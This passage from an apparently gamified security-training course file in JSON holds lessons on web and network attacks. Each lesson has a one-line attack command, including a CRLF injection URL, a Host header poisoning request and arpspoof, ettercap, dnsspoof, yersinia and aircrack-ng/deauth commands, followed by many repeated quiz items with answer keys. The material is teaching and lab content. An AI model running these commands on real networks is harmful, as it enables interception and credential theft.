required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"header-inj","cat":"Web Application","title":"Header Injection","diff":2,"xp":125,"intro":"CRLF injection.","sections":[{"type":"text","content":"CRLF injection."},{"type":"code","lang":"bash","content":"?url=http://target%0d%0aSet-Cookie:%20admin=true"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Injected chars?","opts":["<>","\\r\\n (CR+LF)","{}","[]"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"host-header","cat":"Web Application","title":"Host Header Attacks","diff":2,"xp":150,"intro":"Cache poisoning via Host.","sections":[{"type":"text","content":"Cache poisoning via Host."},{"type":"code","lang":"http","content":"POST /forgot HTTP/1.1\nHost: attacker.com"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Host header attack?","opts":["SQLi","Password reset poisoning","XSS","CSRF"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"insecure-cookie","cat":"Web Application","title":"Insecure Cookies","diff":1,"xp":75,"intro":"Missing cookie security flags.","sections":[{"type":"text","content":"Missing cookie security flags."},{"type":"code","lang":"http","content":"Set-Cookie: session=abc123\n# Missing: Secure, HttpOnly, SameSite"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Prevents JS access?","opts":["Secure","HttpOnly","SameSite","Path"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"arp-spoof","cat":"Network Attacks","title":"ARP Spoofing","diff":1,"xp":100,"intro":"Poison ARP caches.","sections":[{"type":"text","content":"Poison ARP caches."},{"type":"code","lang":"bash","content":"sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1"},{"type":"text","content":"Network attacks exploit the fundamental trust assumptions in protocols designed decades ago. ARP has no authentication, DNS responses aren't verified, and broadcast protocols answer anyone who asks. Understanding WHY these protocols are vulnerable teaches you more than memorizing attack tools."},{"type":"tip","content":"Always set up a controlled lab network before practicing network attacks. Use VirtualBox/VMware with host-only networking. Never run ARP spoofing, MITM, or packet injection on a network you don't own \u2014 it's illegal and can disrupt real services."},{"type":"task","content":"Build a virtual lab with at least 3 VMs: an attacker (Kali), a target (Metasploitable or a Windows box), and a router/gateway. Practice a full MITM attack: ARP spoof to intercept traffic, capture credentials from an unencrypted service (FTP or HTTP), then defend against it by enabling ARP inspection."},{"type":"quiz","q":"ARP spoofing manipulates?","opts":["DNS","MAC-to-IP mapping","Routing tables","Firewall"],"ans":1},{"type":"quiz","q":"ARP operates at which OSI layer?","opts":["Layer 3","Layer 4","Layer 2","Layer 7"],"ans":2},{"type":"quiz","q":"A MITM attack requires the attacker to be...","opts":["On a different network","Between the victim and the server","Physical at the server","Root on the victim"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"mitm-atk","cat":"Network Attacks","title":"Man-in-the-Middle","diff":1,"xp":100,"intro":"Intercept communications.","sections":[{"type":"text","content":"Intercept communications."},{"type":"code","lang":"bash","content":"sudo ettercap -T -q -M arp:remote /gateway// /target//"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"MITM prerequisite?","opts":["Root on target","Same network segment","Physical access","Admin creds"],"ans":1},{"type":"quiz","q":"What protocol does ping use?","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is typically used for...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"dns-poison","cat":"Network Attacks","title":"DNS Poisoning","diff":2,"xp":150,"intro":"Redirect DNS queries.","sections":[{"type":"text","content":"Redirect DNS queries."},{"type":"code","lang":"bash","content":"sudo dnsspoof -i eth0 host target.com"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"DNS poisoning changes?","opts":["ARP","DNS responses (domain\u2192IP)","Routing","MAC"],"ans":1},{"type":"quiz","q":"A SYN flood targets which resource?","opts":["Disk space","Connection table (half-open connections)","CPU","RAM"],"ans":1},{"type":"quiz","q":"ARP operates at which OSI layer?","opts":["Layer 3","Layer 4","Layer 2","Layer 7"],"ans":2},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"vlan-hop","cat":"Network Attacks","title":"VLAN Hopping","diff":2,"xp":175,"intro":"Escape VLAN segmentation.","sections":[{"type":"text","content":"Escape VLAN segmentation."},{"type":"code","lang":"bash","content":"yersinia dtp -attack 1 -interface eth0"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Switch spoofing exploits?","opts":["STP","DTP","LACP","CDP"],"ans":1},{"type":"quiz","q":"A MITM attack requires the attacker to be...","opts":["On a different network","Between the victim and the server","Physical at the server","Root on the victim"],"ans":1},{"type":"quiz","q":"What protocol does ping use?","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"wpa-crack","cat":"Network Attacks","title":"WPA/WPA2 Cracking","diff":2,"xp":150,"intro":"Crack WiFi handshakes.","sections":[{"type":"text","content":"Crack WiFi handshakes."},{"type":"code","lang":"bash","content":"sudo airodump-ng -c 6 --bssid AP -w cap wlan0mon\nsudo aireplay-ng -0 5 -a AP wlan0mon\naircrack-ng -w rockyou.txt cap-01.cap"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Must capture for WPA?","opts":["Hash","4-way handshake","SSID","MAC"],"ans":1},{"type":"quiz","q":"Port 443 is typically used for...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"A SYN flood targets which resource?","opts":["Disk space","Connection table (half-open connections)","CPU","RAM"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at 